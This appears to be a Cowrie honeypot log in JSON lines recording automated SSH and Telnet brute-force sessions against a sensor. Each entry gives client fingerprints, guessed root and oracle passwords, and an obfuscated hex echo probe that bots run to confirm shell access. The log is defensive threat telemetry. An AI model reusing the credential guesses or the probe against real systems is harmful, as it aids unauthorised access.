{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:59.884482Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
{"eventid":"cowrie.login.success","username":"root","password":"22","message":"login attempt [root/22] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:59.955435Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:00.018324Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:00.019031Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:00.042745Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:00.044130Z","src_ip":"212.227.125.160","session":"3c87f456ddd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38546,"dst_ip":"1.2.3.4","dst_port":22,"session":"a58b3868baf8","protocol":"ssh","message":"New connection: 212.227.125.160:38546 (1.2.3.4:22) [session: a58b3868baf8]","sensor":"my-vps","timestamp":"2025-08-28T11:48:02.762763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:02.806526Z","src_ip":"212.227.125.160","session":"a58b3868baf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60655,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e2196f8c14d","protocol":"telnet","message":"New connection: 212.227.125.160:60655 (1.2.3.4:23) [session: 0e2196f8c14d]","sensor":"my-vps","timestamp":"2025-08-28T11:48:03.086431Z"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:48:03.127820Z","src_ip":"212.227.125.160","session":"a58b3868baf8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345","message":"login attempt [oracle/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:48:03.738715Z","src_ip":"212.227.125.160","session":"a58b3868baf8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:05.020482Z","src_ip":"212.227.125.160","session":"a58b3868baf8"}
{"eventid":"cowrie.session.closed","duration":12.42991042137146,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:15.516269Z","src_ip":"212.227.125.160","session":"0e2196f8c14d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48764,"dst_ip":"1.2.3.4","dst_port":22,"session":"d307b50552e0","protocol":"ssh","message":"New connection: 212.227.125.160:48764 (1.2.3.4:22) [session: d307b50552e0]","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.120264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.130227Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.179422Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.login.success","username":"root","password":"180485","message":"login attempt [root/180485] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.487348Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:16.716294Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.717066Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.755483Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:16.756703Z","src_ip":"212.227.125.160","session":"d307b50552e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48768,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9472ce22b16","protocol":"ssh","message":"New connection: 212.227.125.160:48768 (1.2.3.4:22) [session: d9472ce22b16]","sensor":"my-vps","timestamp":"2025-08-28T11:48:21.877590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:21.881488Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:21.903027Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.login.success","username":"root","password":"161190","message":"login attempt [root/161190] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:21.994396Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:22.053895Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.054616Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.078260Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.079629Z","src_ip":"212.227.125.160","session":"d9472ce22b16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55366,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1f22890eb6b","protocol":"ssh","message":"New connection: 212.227.125.160:55366 (1.2.3.4:22) [session: e1f22890eb6b]","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.100189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.100888Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.123100Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.login.success","username":"root","password":"160588","message":"login attempt [root/160588] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.197527Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:22.257514Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.258197Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.281993Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:22.283460Z","src_ip":"212.227.125.160","session":"e1f22890eb6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55382,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf943e948198","protocol":"ssh","message":"New connection: 212.227.125.160:55382 (1.2.3.4:22) [session: bf943e948198]","sensor":"my-vps","timestamp":"2025-08-28T11:48:25.397274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:25.398235Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:25.420917Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.login.success","username":"root","password":"160587","message":"login attempt [root/160587] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:25.494767Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:25.985565Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:25.986402Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:26.010908Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:26.012130Z","src_ip":"212.227.125.160","session":"bf943e948198"}
{"eventid":"cowrie.session.connect","src_ip":"213.190.206.223","src_port":34538,"dst_ip":"1.2.3.4","dst_port":23,"session":"b90eae8101c0","protocol":"telnet","message":"New connection: 213.190.206.223:34538 (1.2.3.4:23) [session: b90eae8101c0]","sensor":"my-vps","timestamp":"2025-08-28T11:48:39.998436Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59382,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0f791108116","protocol":"ssh","message":"New connection: 212.227.125.160:59382 (1.2.3.4:22) [session: c0f791108116]","sensor":"my-vps","timestamp":"2025-08-28T11:48:44.287237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:44.290910Z","src_ip":"212.227.125.160","session":"c0f791108116"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:48:44.458720Z","src_ip":"212.227.125.160","session":"c0f791108116"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345678","message":"login attempt [oracle/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:48:45.141668Z","src_ip":"212.227.125.160","session":"c0f791108116"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44900,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0974fd24857","protocol":"ssh","message":"New connection: 212.227.125.160:44900 (1.2.3.4:22) [session: a0974fd24857]","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.133628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.134845Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.157407Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.login.success","username":"root","password":"131082","message":"login attempt [root/131082] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.232745Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:48:46.296015Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.296803Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.313739Z","src_ip":"212.227.125.160","session":"c0f791108116"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.320840Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:48:46.321988Z","src_ip":"212.227.125.160","session":"a0974fd24857"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44904,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0119cc63e5c","protocol":"ssh","message":"New connection: 212.227.125.160:44904 (1.2.3.4:22) [session: a0119cc63e5c]","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.349260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:48:47.349916Z","src_ip":"212.227.125.160","session":"a0119cc63e5c"}
